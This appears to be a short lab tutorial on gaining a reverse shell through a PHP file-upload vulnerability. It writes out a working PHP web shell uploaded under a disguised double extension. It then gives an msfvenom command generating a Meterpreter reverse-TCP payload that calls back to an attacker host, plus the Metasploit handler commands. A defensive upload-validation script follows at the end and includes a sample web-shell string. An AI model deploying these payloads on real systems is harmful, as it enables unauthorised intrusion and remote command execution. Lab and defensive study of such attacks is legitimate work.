Metasploit, Reverse shell

2017-12-11 21:48:51

Before we start

For educational purposes only.

What you need

  • Target machine 192.168.0.102 with a PHP app where you can upload a file
  • Kali Linux machine 192.168.0.104

Start

To start playing with a reverse shell and Metasploit, you need an app that lets you upload a PHP file or a php.jpg file :D.

How to test

Try to upload a simple PHP file. If you run into any problem, play with the extension or the content type.

Test file

Content-Disposition: form-data; name="file"; filename="cmd.php.jpg"
Content-Type: application/x-php

<?php 
    if(isset($_GET['cmd'])) {
        echo "<pre>";
        system($_GET['cmd']);
        echo "</pre>";
    }else{
        echo "lol";
    }
?>

Confirm

You have to confirm that the file was uploaded and that you can execute it, for example by visiting the URL 192.168.0.102/uploads/cmd.php.jpg?cmd=ls -la

Metasploit / Kali & Update

I tested this on Metasploit v4.16.21-dev; if your version is outdated, consider updating:

apt update; apt install metasploit-framework

Generate exploit

msfvenom -p php/meterpreter/reverse_tcp LHOST=192.168.0.104 LPORT=4444 -e php/base64 -f raw > msfvenom2.php.jpg

Important: you have to edit 'msfvenom2.php.jpg' and wrap the payload in

<?php ... ?>

When you are ready, upload this file to the server.

Hammer time

In the msf console, type:

msf > 
msf > use exploit/multi/handler
msf exploit(multi/handler) > set payload php/meterpreter/reverse_tcp
payload => php/meterpreter/reverse_tcp
msf exploit(multi/handler) > set LHOST 192.168.0.104
LHOST => 192.168.0.104
msf exploit(multi/handler) > set LPORT 4444
LPORT => 4444
msf exploit(multi/handler) > exploit

and visit this page: 192.168.0.102/uploads/msfvenom2.php.jpg. Boom, now you should have a reverse shell. Type something in the msf console like "ls" or "pwd"; for more options, type "shell".
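
Seen from the application's side, both files uploaded in this walkthrough (cmd.php.jpg and msfvenom2.php.jpg) fail basic upload validation. The check below is an added example, not part of the original post; the function name `audit_upload`, the image-only policy and the sample bytes are assumptions made for illustration.

```python
import re

# Assumed policy for this example: the application only accepts images.
ALLOWED = {"jpg": b"\xff\xd8\xff", "jpeg": b"\xff\xd8\xff",
           "png": b"\x89PNG\r\n\x1a\n"}
ALLOWED_TYPES = {"image/jpeg", "image/png"}
# Extensions a PHP-enabled web server may hand to the interpreter.
SCRIPT_EXT = {"php", "php3", "php4", "php5", "php7", "phtml", "phar", "pht"}
PHP_TAG = re.compile(rb"<\?php", re.IGNORECASE)


def audit_upload(filename, declared_type, data):
    """Return a list of reasons to reject the upload (empty list = accept)."""
    findings = []
    parts = filename.lower().split(".")
    ext = parts[-1] if len(parts) > 1 else ""
    # Check every extension, not only the last one: with Apache's AddHandler
    # a file named x.php.jpg can still be passed to PHP.
    if SCRIPT_EXT.intersection(parts[1:]):
        findings.append("script extension in filename")
    if ext not in ALLOWED:
        findings.append("final extension not allowed")
    elif not data.startswith(ALLOWED[ext]):
        findings.append("content does not match extension")
    # The Content-Type header is client-controlled; treat it as a hint only.
    if declared_type not in ALLOWED_TYPES:
        findings.append("declared content type not allowed")
    # Catches a script appended to otherwise valid image bytes.
    if PHP_TAG.search(data):
        findings.append("PHP open tag in file body")
    return findings


# Constructed samples mirroring the uploads described on this page.
WEBSHELL = b'<?php system($_GET["cmd"]); ?>'
CLEAN_JPEG = b"\xff\xd8\xff\xe0" + b"\x00" * 16
POLYGLOT = CLEAN_JPEG + WEBSHELL

if __name__ == "__main__":
    print(audit_upload("cmd.php.jpg", "application/x-php", WEBSHELL))
    print(audit_upload("photo.jpg", "image/jpeg", POLYGLOT))
    print(audit_upload("photo.jpg", "image/jpeg", CLEAN_JPEG))
```

The PHP-tag scan is a heuristic. Storing uploads outside the web root, or in a directory where the PHP handler is disabled, removes the execution path regardless of what the file contains.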